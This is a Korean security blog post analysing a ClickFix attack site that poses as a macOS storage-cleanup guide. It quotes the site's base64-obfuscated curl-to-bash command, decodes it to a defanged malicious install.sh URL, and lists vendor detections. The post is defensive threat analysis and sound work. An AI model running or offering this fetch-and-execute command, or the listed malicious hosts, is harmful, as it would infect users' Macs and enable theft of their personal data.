오늘은 애플 맥(Apple macOS) 맥북 저장 공간 확보를 악용한 클릭픽스(ClickFix) 공격 사이트 간단 분석(2025.7.11) 에 대해 알아보겠습니다.
MacBook의 Apple의 Mac 제품군 중 노트북 컴퓨터 라인업 중 하나이며 기본적으로 macOS를 사용을 할 것이며 macOS는 Apple이 Unix와 Darwin을 기반으로 개발한 Mac 전용 운영체제입니다. 일단 흔히들 잘못 아는 것 중 하나가 애플 맥북은 악성코드 감염 안 됨이라고 생각을 하시는 분들도 있겠지만…. 몇 년 전부터 해당 맥북 및 iOS,macOS 를 감염시키는 악성코드가 늘어나고 있습니다. 대표적인 것이 클릭픽스(Click Fix)를 통한 공격입니다.
일단 클릭픽스(ClickFix) 공격에 사용된 주소는 다음과 같습니다.
클릭픽스(ClickFix) 공격 사이트
hxxps://top-fixer(.)com/?p=141일단 오늘 알아보는 클릭픽스(ClickFix) 공격 사이트는 다음과 같은 내용을 담고 있습니다.
Mac 저장 공간이 부족하냐? 정크 파일, 캐시, 잔여 파일이 시간이 지남에 따라 쌓이는 것은 최신 Mac에서도 흔히 발생하는 문제
간단한 터미널 명령을 사용하여 몇 초 만에 저장 공간을 비울 수 있음
어때 한번 해봐? 간단하지 라는 방법을 사용하고 있습니다.
Press Command + Space to launch Spotlight Search
Type Terminal, then press Enter to launch
방법으로 사용하고 있습니다.
그러면 아래의 코드를 넣고 엔터키 치라고 합니다. 그 순간 망하는 것입니다.
해당 사이트는 다음과 같이 동작을 합니다.
/bin/bash -c "$(curl -fsSL $(echo aHR0cHM6L(y)9hZHJpYW5mcmllZy5(j)b20vZ2(8)vaW5zd(G)Fs(b)C5zaA== | base64 -d))"여기서 base64 로 인코딩된 것을 볼 수가 있는데 해당 부분을 CyberChef(사이버셰프)로 풀어주면 됩니다.
해당 부분을 풀어주면 다음과 같은 사이트가 나오는 것을 확인할 수가 있습니다.
hxxps://adrianfrieg(.)com/go/install(.)sh분석
1.base64 인코딩된 데이터
hxxps://adrianfrieg(.)com/go/install(.)sh
2.curl로 스크립트 다운로드
curl은 명령 줄에서 URL 요청
악성코드 동작 시 옵션:
-f: 요청 실패 시 조용히 처리
-s: 진행률, 오류 메시지 출력 안 함
-S: 오류가 발생했을 때만 메시지 출력
-L: 리다이렉션 자동 따라감
curl 명령은 install(.)sh의 내용을 받아서 동작하게 돼 있습니다.
$(curl -fsSL URL)의 출력된 스크립트가 bash 명령으로 실행되는 방식을 사용하고 있음
공격 방식 요약
1.Base64 디코딩을 통해 URL 추출
2.해당 URL에서 curl 사용해서 스크립트 파일을 다운로드
3.다운로드된 스크립트를 bash로 실행
을 합니다. 해당 install(.)sh를 까보아야 알 수가 있겠지만 아마도 비디오이기 때문에 개인정보 탈취 목적입니다. 즉 저장공간을 정리하는 것이 아니고 악성코드 감염을 통한 개인정보 탈취이며 제가 해커 라면 디스크 정리는 해주면서 악성코드 동작을 통해서 개인정보를 털 것 같습니다.
이런 것을 방지하기 위해서 반드시 맥북을 사용하는 분들도 백신 프로그램(안티바이러스 프로그램)을 설치를 하는 것을 권장합니다. 일단 노턴은 잘 잡고 있지만 Emsisoft Browser Security은 탐지 못 해서 일단 신고
2025-07-09 23:12:22 UTC 기준 탐지하는 보안 업체들
BitDefender:Malware
ESET:Malware
Fortinet:Malware
G-Data:Malware
Google Safebrowsing:Malicious
Seclookup:Malicious
Gridinsoft:Suspicious
신토불이(身土不二)는 할떄 하고 보안제품은 해외 제품을 개인적으로 추천합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| ExpressVPN 버그로 인해 원격 데스크톱 세션에서 사용자 IP 유출 (0) | 2025.07.22 |
|---|---|
| 주적 북한 해킹 단체 코니(Konni)에서 제작한 악성코드-자금출처명세서.lnk(2025.5.28) (0) | 2025.07.21 |
| 스마트폰 충전 중 스마트폰 해킹 초이스재킹(Choice Jacking) 예방 방법 (0) | 2025.07.18 |
| 부킹 닷컴(Booking) 피싱 사이트를 악용한 클릭픽스 공격(Clickfix) (0) | 2025.07.16 |
| 김수키(Kimsuky)에서 제작한 네이버 블로그 제한 안내 드립니다.피싱 메일 분석(2025.6.30) (0) | 2025.07.15 |
| 위쳇(Wechat)으로 위장한 스테가노그래피(Steganography)를 악용한 악성코드-Meterpreter 백도어(2024.5.29) (2) | 2025.07.14 |
| 러시아 프로 농구 선수 다닐 카사트킨 (Daniil Kasatkin) 랜섬웨어 공격에 가담한 혐의로 체포 (0) | 2025.07.13 |
| 7-Zip 25.00 보안 업데이트 및 더 많은 CPU 스레드를 지원하고 압축 속도를 향상 (0) | 2025.07.12 |
